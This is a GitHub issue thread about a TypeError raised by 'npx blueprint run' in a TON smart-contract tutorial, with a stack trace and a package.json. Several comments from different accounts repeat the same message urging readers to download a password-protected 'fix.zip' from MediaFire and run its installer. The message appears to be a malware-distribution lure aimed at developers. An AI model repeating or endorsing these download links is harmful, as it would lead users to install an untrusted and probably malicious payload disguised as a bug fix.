### ISSUE TITLE
02-contract deploy contract by command "npx blueprint run" TypeError

### ISSUE THREAD

**Issue by liueleven** [ton-community/tutorials#69]
While studying Lesson 2 【http://tonhelloworld.com/02-contract/】, when I was about to deploy the contract to the testnet, I ran the command `npx blueprint run` (local Mac environment), but an error occurred.( "@ton/blueprint": "^0.22.0",)

TypeError: Cannot read properties of undefined (reading 'slice')
    at /Users/liuziqing/work/learn/blockchain/ton/contract/counter/counter/node_modules/@ton/blueprint/dist/utils/selection.utils.js:65:51
    at Array.map (<anonymous>)
    at findScripts (/Users/liuziqing/work/learn/blockchain/ton/contract/counter/counter/node_modules/@ton/blueprint/dist/utils/selection.utils.js:63:20)
    at async run (/Users/liuziqing/work/learn/blockchain/ton/contract/counter/counter/node_modules/@ton/blueprint/dist/cli/run.js:17:59)
    at async main (/Users/liuziqing/work/learn/blockchain/ton/contract/counter/counter/node_modules/@ton/blueprint/dist/cli/cli.js:91:5)

package.json

{
    "name": "counter",
    "version": "0.0.1",
    "scripts": {
        "start": "blueprint run",
        "build": "blueprint build",
        "test": "jest --verbose"
    },
    "devDependencies": {
        "@ton/blueprint": "^0.22.0",
        "@ton/core": "~0",
        "@ton/crypto": "^3.2.0",
        "@ton/sandbox": "^0.20.0",
        "@ton/test-utils": "^0.4.2",
        "@ton/ton": "^13.11.2",
        "@types/jest": "^29.5.12",
        "@types/node": "^20.14.10",
        "jest": "^29.7.0",
        "prettier": "^3.3.2",
        "ts-jest": "^29.2.0",
        "ts-node": "^10.9.2",
        "typescript": "^5.5.3"
    },
    "dependencies": {
        "@orbs-network/ton-access": "^2.3.3",
        "dotenv": "^16.4.5",
        "func-js": "^0.1.1"
    }
}

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liueleven** [comment]
I find a result, see https://github.com/ton-org/blueprint/issues/139

**Comment by liueleven** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

3Q

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
